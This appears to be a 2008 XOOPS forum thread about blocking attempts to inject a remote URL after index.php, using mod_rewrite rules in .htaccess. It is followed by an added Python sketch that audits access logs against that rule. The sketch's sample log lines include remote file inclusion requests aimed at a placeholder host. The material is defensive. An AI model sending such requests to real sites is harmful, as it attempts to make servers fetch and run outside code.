1
Cuidiu
Content Module Question
  • 2008/2/20 3:14

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


I have found many attempts in my access log files of people adding a URL after index.php? in the content module.
Ex: index.php? http bad-domain-dot-com along with head and other commands in URL (rephrased and spaced so I won't be banned by Protector!)

I have Protector 3.02 and it didn't seem to stop or ban them. Is there anything I can do in .htaccess file to redirect hackers trying to add a URL to any index.php page? Like send them to 404 or some other error page - or send them off the planet?

Thanks in advance.
Cuidiu
Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)

2
Cuidiu
[SOLVED] Re: Content Module Question
  • 2008/2/22 0:10

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


I just wanted to post the solution I found elsewhere. So far, everything seems to be working on the site AND it's preventing spammers/hackers from adding their URL after my index.php pages.

RewriteCond %{QUERY_STRING} https?:
RewriteRule .* - [F]


C

3
Peekay
Re: Content Module Question
  • 2008/2/22 8:54

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


I see 'https' in the code, is your XOOPS hosted as a secure site, or does that code mean something else?
A thread is for life. Not just for Christmas.

4
Cuidiu
Re: Content Module Question
  • 2008/2/23 21:38

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


Quote:
Peekay wrote:
I see 'https' in the code, is your XOOPS hosted as a secure site, or does that code mean something else?

Hi Peekay,

I wondered the same thing myself. I found the code in a forum elsewhere, in a reply to someone who had the same problem. I think it either means something else or it is including http and https. The site I'm using it on is not a secure site so I don't know for sure. I just know it works!

Cuidiu

5
Peekay
Re: Content Module Question
  • 2008/2/24 0:03

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Quote:

Cuidiu wrote:
I don't know for sure. I just know it works!

I recognise that feeling!

Thx for the tip. I found some useful re-write stuff here too:

http://forum.modrewrite.com/
A thread is for life. Not just for Christmas.

6
Cuidiu
Re: Content Module Question
  • 2008/2/25 0:28

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


Thanks for the resource! I have a question. What is the difference between these two RewriteRules?
RewriteCond %{HTTP_USER_AGENT} ^[a-z0-9\s]+$ [NC]
RewriteRule ^.* - [F,L] (with the ^ start of the line anchor)

RewriteCond %{HTTP_USER_AGENT} ^[a-z0-9\s]+$ [NC]
RewriteRule .* - [F,L] (without the ^)

I see that both of them are recommended on the internet. I use RewriteRule ^.* - [F,L]. Is it the Apache version that makes the difference? I suppose I could post over on modrewrite.com but thought you might know it offhand.

Thanks,
C

Quote:
Peekay wrote:
Thx for the tip. I found some useful re-write stuff here too:

http://forum.modrewrite.com/

7
Peekay
Re: Content Module Question
  • 2008/2/25 10:21

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


The '^' is a regex anchor, which normally means 'match the following character only at the beginning of a line'. It may mean something different in htaccess though.

These sites may reveal the answer. If not, I would post on the modrewrite forum!

http://www.regular-expressions.info/anchors.html

http://www.garnetchaney.com/htaccess_tips_and_tricks.shtml
A thread is for life. Not just for Christmas.
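
An added example, not part of any post in this thread: a Python sketch that replays the `https?:` condition from post 2 over access-log lines, showing which requests the rule answers with 403 and which URL-bearing query strings it does not match. The log lines, IP addresses and `bad-domain.example` host are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# The pattern from the RewriteCond posted in the thread. mod_rewrite does an
# unanchored search, so re.search() is the matching Python call. The "?" makes
# the "s" optional, so the one pattern covers both "http:" and "https:".
RULE = re.compile(r"https?:")

# Request line inside an Apache access-log entry: "METHOD /path?query HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IPs, placeholder domain).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Feb/2008:03:10:01 +0000] "GET /modules/content/index.php?id=4 HTTP/1.1" 200 5120
192.0.2.77 - - [20/Feb/2008:03:11:09 +0000] "GET /modules/content/index.php?http://bad-domain.example/x.txt? HTTP/1.1" 200 5120
192.0.2.78 - - [20/Feb/2008:03:11:40 +0000] "GET /modules/content/index.php?id=https://bad-domain.example/x.txt HTTP/1.1" 200 5120
192.0.2.79 - - [20/Feb/2008:03:12:02 +0000] "GET /modules/content/index.php?id=HTTP://bad-domain.example/x.txt HTTP/1.1" 200 5120
192.0.2.80 - - [20/Feb/2008:03:12:30 +0000] "GET /modules/content/index.php?id=http%3A%2F%2Fbad-domain.example%2Fx.txt HTTP/1.1" 200 5120
"""

def classify(query):
    """Return 'blocked', 'missed' or 'clean' for one raw query string."""
    if RULE.search(query):
        return "blocked"  # the rule as posted would answer 403 Forbidden
    # %{QUERY_STRING} is the raw, still-encoded string and the posted rule has
    # no [NC] flag, so look again case-insensitively on the decoded value.
    if re.search(r"https?:", unquote(query), re.IGNORECASE):
        return "missed"
    return "clean"

def audit(log_text):
    """Classify every request in the log as (client, query, verdict) tuples."""
    results = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        _, _, query = m.group(1).partition("?")
        results.append((line.split()[0], query, classify(query)))
    return results

if __name__ == "__main__":
    for client, query, verdict in audit(SAMPLE_LOG):
        print(f"{verdict:8} {client:12} {query}")
```

Lines reported as `missed` are the ones worth reviewing in the real access log, since the rule as posted lets them through to the application.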
